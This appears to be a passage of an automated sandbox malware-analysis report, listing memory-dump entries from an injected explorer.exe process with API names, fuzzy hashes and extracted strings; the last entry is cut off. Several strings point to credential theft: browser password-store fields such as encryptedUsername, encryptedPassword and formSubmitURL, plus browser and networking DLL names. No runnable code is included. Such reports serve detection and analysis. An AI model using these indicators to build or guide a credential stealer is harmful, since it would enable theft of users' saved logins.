                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: 2f4ce38e7cef43fd3605e01bec49d0aa6f2fab39d020258d35ce10bcb85e5965
                                                                                • Instruction ID: 4c70f8e3ebd53a328e055b10125d656f5c58f377a7dae4c5d68e85e90d674d6b
                                                                                • Opcode Fuzzy Hash: 2f4ce38e7cef43fd3605e01bec49d0aa6f2fab39d020258d35ce10bcb85e5965
                                                                                • Instruction Fuzzy Hash: 8A316F30218A099BCB58EF29C4956EBF3E4FB98301F40572FA45EDB255DF30E54487A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                • Instruction ID: 45122f01e07fd6bb53f282546eb24a720e79ca5cb8fd5ba83f7d3a13b80b7df5
                                                                                • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                • Instruction Fuzzy Hash: 75316C70614B09DADB64AF6A80882E6F7A1FB54301F44466FCDADCB216CBB89854CFD1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 8c657c8843524b1533129edab0e69ecf76e5173f11c074f69852b53bcaffa6f6
                                                                                • Instruction ID: 28a473ba9b3d235a7a153190f4e1cb9ba08703c8cdfabe39a2f4fcd5a3b44e4d
                                                                                • Opcode Fuzzy Hash: 8c657c8843524b1533129edab0e69ecf76e5173f11c074f69852b53bcaffa6f6
                                                                                • Instruction Fuzzy Hash: 4111AC70218B4C4FD794EF3888883AEB7E1FBA8254F80592FA44BCB244DF34C4858B11
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                • Instruction ID: 9e733186201906c9508d28073b7890fb898cb9f1879510946fd5a1d83101dca2
                                                                                • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                • Instruction Fuzzy Hash: 39F0C230268A484FE788EF2CD44563AB3D0EBA8215F440A3FA58DC7264DA69C9818756
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                • API String ID: 0-393284711
                                                                                • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                • Instruction ID: 4f23113e848afb8dbf9d426ecc7fafb0c2f596d6c019f583d3453324a4232efb
                                                                                • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                • Instruction Fuzzy Hash: 22E19BB4618F488FDBA8DF28C4857AAB7E0FB58305F504A2EA59FC7251DF34A501CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                • API String ID: 0-393284711
                                                                                • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                • Instruction ID: ca3e7ae403b24ff2ef8003e6a57d8cf27859af56b2c03dd89da9027892de4147
                                                                                • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                • Instruction Fuzzy Hash: A3E14B74528F488FC7A4DF68D485BAAB7E0FF58300F904A2EA59BC7255DF30A581CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                • API String ID: 0-2916316912
                                                                                • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                • Instruction ID: ac4661cecb2e07b4130958f9f28167d26283f9fbdb2176f88ed1a5793bbfec83
                                                                                • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                • Instruction Fuzzy Hash: D3B1BB30518B488EEB54EF68C486AEEB7F1FF98304F50451EE59ACB211EF74A5058B86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                • API String ID: 0-2916316912
                                                                                • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                • Instruction ID: 64e9138be519595673f3854763117b6ec48bfc7a8fd05685f8247c02aec73637
                                                                                • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                • Instruction Fuzzy Hash: 21B18C30518B488EDB55EFA8D486AEEB7F1FF98300F90451EE49AC7251EF70A445CB86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                • API String ID: 0-1539916866
                                                                                • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                • Instruction ID: d060a97cfaa7a947ecd25ca1cd42458fefb667adf5a64deabcde89eb8e8849c0
                                                                                • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                • Instruction Fuzzy Hash: 6D41D470A18B188FDB18DF88A4866BE7BF2FB48705F00025EE849D7341DB799D458BD6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                • API String ID: 0-1539916866
                                                                                • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                • Instruction ID: 66aeef1fa1322840ffa2484aa6f7831fb11c7d00043475dfa2331208b576fce4
                                                                                • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                • Instruction Fuzzy Hash: 28419D70A1CB089FDB18DF88A4466AD7BE2FB48700F40026EE409D3245DBB5AD85CBD6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                • API String ID: 0-355182820
                                                                                • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                • Instruction ID: 7cfded62f5e66bd47bf8a0ed4fb276fd1b8418b3a3247e7f01fb51b3676bb5f5
                                                                                • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                • Instruction Fuzzy Hash: 81C15A74618B099BD758EF28C4C6ADAF3E1FB98304F50462EA49AC7250DF34B615CB86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                • API String ID: 0-355182820
                                                                                • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                • Instruction ID: 6e1abeed14b886510be689ae557a41b35cbcbaa5a4dd38f61901bfea9509170c
                                                                                • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                • Instruction Fuzzy Hash: 92C16B7421CB098FC758EF68D4866EAF7E1FF94304F80462EA49AC7250DF70A555CB86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                • API String ID: 0-97273177
                                                                                • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                • Instruction ID: f5c468859152b4309b41fac440cffe495a8a86ffefc0074f35cef7c1b8bf50b7
                                                                                • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                • Instruction Fuzzy Hash: AC51D7705187488FE749CF18D4C12AAB7E5FBC5704F601A2EE9CBC7251DBB89946CB82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                • API String ID: 0-97273177
                                                                                • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                • Instruction ID: 4126e95d81af56a240e1b43d1f5674114613dcb4e33642a577e96806f6f0c545
                                                                                • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                • Instruction Fuzzy Hash: B951B43551C7488FD709CF18E4816AAB7E5FF85710F901A2EE8CBC7251DBB4A946CB82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                • API String ID: 0-639201278
                                                                                • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                • Instruction ID: 8cb242c1501ba08c513e35c9e56a1d2b42607b5f66672873135fb9451c428664
                                                                                • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                • Instruction Fuzzy Hash: 97C1B174618A194FC748EF68D4D6AAAB3E1FB98305F51432D944ECB251DF34EA01C7C5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                • API String ID: 0-639201278
                                                                                • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                • Instruction ID: 870ac120d992c1a38a46614db904dd29e2bfb6ac915232eda08360ef4a85c65d
                                                                                • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                • Instruction Fuzzy Hash: D2C1B074618A294FC758EF28D4D6AAAB3E1FB98305F91432D944ECB251DF34EA01C7C5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                • API String ID: 0-639201278
                                                                                • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                • Instruction ID: 61d0d242baa5b31a2de1d1453ce0d8fbb4b5ebcfd0df9b919f71ebb016e50ebf
                                                                                • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                • Instruction Fuzzy Hash: 96C1A17461CA194FC748EF68E456AAAF3E1FF98300F914329A44EC7251DF30A981CBC5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                • API String ID: 0-639201278
                                                                                • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                • Instruction ID: b65d6fde14bab3465c684d1ceb5c6715edd83bd607b9c3ffe42d92c2e94bd378
                                                                                • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                • Instruction Fuzzy Hash: F8C1A17461CA194FC758EF68E456AAAF3E1FF98300F914329A44ED7251DF30AA81CBC5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                • API String ID: 0-2058692283
                                                                                • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                • Instruction ID: ae33ce1e9d7b69a9ab349874502edd096b0386841be55c01641760b4d77b7739
                                                                                • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                • Instruction Fuzzy Hash: DAA1DF70A1874C8BDB18DFA8D4857EEB7E1FF88305F00462DE58AD7281EF3499468789
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                • API String ID: 0-2058692283
                                                                                • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                • Instruction ID: ea3489d66c43539eb1a1e0954824491673ebec33b9555219b69c622ccd8dd7c7
                                                                                • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                • Instruction Fuzzy Hash: F1A19F7061CA4C8BDB19DFA8A4457EEB7E1FF88300F40462EE48AD7251EF709985C789
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                • API String ID: 0-2058692283
                                                                                • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                • Instruction ID: 5896f7bcafe23894902b68c4ebe9f317674303b7e8d672bdcbb36b5dedc42609
                                                                                • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                • Instruction Fuzzy Hash: AC91BF70A1874C8BDB18DFA8D484BEEB7E1FF88304F00462DE58AD7281EF7495458B89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                • API String ID: 0-2058692283
                                                                                • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                • Instruction ID: 00b15ff6b55c886954511c0a956732a45b33bd59a1be58cb5175d43533e3c437
                                                                                • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                • Instruction Fuzzy Hash: C9917D7061CB4C8BDB18DFA8A444BEEB7E1FB98300F40462EE48AD7251EF709585CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $.$e$n$v
                                                                                • API String ID: 0-1849617553
                                                                                • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                • Instruction ID: 560ba0a7b1f97337d34da82bdd668aa2e4468cf2ccac29e17fc0db0a8c430479
                                                                                • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                • Instruction Fuzzy Hash: 5071A231618B488FE758DF68C4856AAB7F1FF98305F10062EE44AC7261EF74E9458B85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $.$e$n$v
                                                                                • API String ID: 0-1849617553
                                                                                • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                • Instruction ID: f8354bc4394cf67d83254b693a69a77969ac2d4b7768b6551cef33bd925a315d
                                                                                • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                • Instruction Fuzzy Hash: 96719035618A488FD758DFA8D4857AAB7F0FF58304F40062EE48AC7221EF71E985CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                • API String ID: 0-1970020201
                                                                                • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                • Instruction ID: d21168b3c2258067799f7f87e0fa301a38fb56dc19066644899b6bb040fda40b
                                                                                • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                • Instruction Fuzzy Hash: 45515FB0918B4C8FDB54DFA4C085AEEB7F1FF58305F40462EA49AE7214EF34A5518B89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                • API String ID: 0-1970020201
                                                                                • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                • Instruction ID: e20b11afdac91cdeb3df393b97872172b1333670dfab7c3a1c12cb8e16109a40
                                                                                • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                • Instruction Fuzzy Hash: F4513DB4918B4C8FDB54DFA8D0456EAB7E1FF58300F40462EA59AE7214EF70A581CB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4$\$dll$ion.$vers
                                                                                • API String ID: 0-1610437797
                                                                                • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                • Instruction ID: f68ac171bf45bb8db398b01b3fe5232c1e58787548ff7f9101540b6b2a2116a6
                                                                                • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                • Instruction Fuzzy Hash: 16419534618B8C8FDBA9EF24D8857EAB3E4FB98305F51462E985EC7240EF34D5058782
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4$\$dll$ion.$vers
                                                                                • API String ID: 0-1610437797
                                                                                • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                • Instruction ID: ab82355c8b660d38cbb87b3da99c567f0f113e55a28ec083366ea60b19ea4c05
                                                                                • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                • Instruction Fuzzy Hash: 3141643421CB4C8BCBA5DF6898457EAB7E5FB94301F81462DA49EC7241DF30D545CB82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2537947444.00000000103C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 103C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_103c0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 32.d$cli.$dll$sspi$user
                                                                                • API String ID: 0-327345718
                                                                                • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                • Instruction ID: 2d9b85ce7c9e95ec0adbed215b13d9c2bd8828545a057c27faed621e8db33793
                                                                                • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                • Instruction Fuzzy Hash: 52416030A58E1DDFDB84EF5880D57AD73E1FB58302F51516EA80ADB340DA78D9918BC2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2538195289.00000000107E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 107E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_107e0000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 32.d$cli.$dll$sspi$user
                                                                                • API String ID: 0-327345718
                                                                                • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                • Instruction ID: db5c540732f49a6434a843f57df8f9721caa40e9a900b55f9989286f20da0f1b
